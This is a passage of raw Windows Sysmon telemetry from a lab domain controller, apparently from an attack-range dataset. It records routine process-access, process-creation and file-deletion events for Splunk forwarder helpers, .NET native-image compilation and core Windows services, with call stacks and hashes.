vc.dll+e032(wow64) 11241100x800000000000000021203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:58.442{4DB9351A-A1FA-60D3-2304-00000000CF01}6508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\196c-0\Microsoft.WSMan.Management.dll2021-06-23 21:04:58.442 10341000x800000000000000021202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.411{4DB9351A-A1F9-60D3-2204-00000000CF01}63006648C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.130{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1F9-60D3-2204-00000000CF01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.130{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.130{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.130{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.130{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.130{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-2204-00000000CF01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.130{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F9-60D3-2204-00000000CF01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.990{4DB9351A-A1F9-60D3-2204-00000000CF01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.114{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FA-60D3-2304-00000000CF01}6508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.114{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4D55CE916C6209C92F01C056DC910D4,SHA256=1183586BE6E9E32C77D3CD57303D6895D892B6CED660288A047FA79530131A70,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.083{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FA-60D3-2304-00000000CF01}6508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.083{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FA-60D3-2304-00000000CF01}6508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.833{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1FB-60D3-2A04-00000000CF01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.833{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.833{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.833{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.833{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.833{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FB-60D3-2A04-00000000CF01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.833{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1FB-60D3-2A04-00000000CF01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.679{4DB9351A-A1FB-60D3-2A04-00000000CF01}3196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.551{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=928D9BB8E936F0457F01FD300B38688D,SHA256=ADCB705F0D24F484223409635C437557267D262F4824DB713E61EDCA779B29EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.536{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0D4C0167892DC8700AF38499680E9D0,SHA256=55928265A6CEF07A493941ABC19FC20EF1DEA0B9566FE4977D305AE659A76C14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.176{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FB-60D3-2904-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.161{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FB-60D3-2904-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.161{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FB-60D3-2904-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.083{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FB-60D3-2804-00000000CF01}5308C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:59.067{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FB-60D3-2804-00000000CF01}5308C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 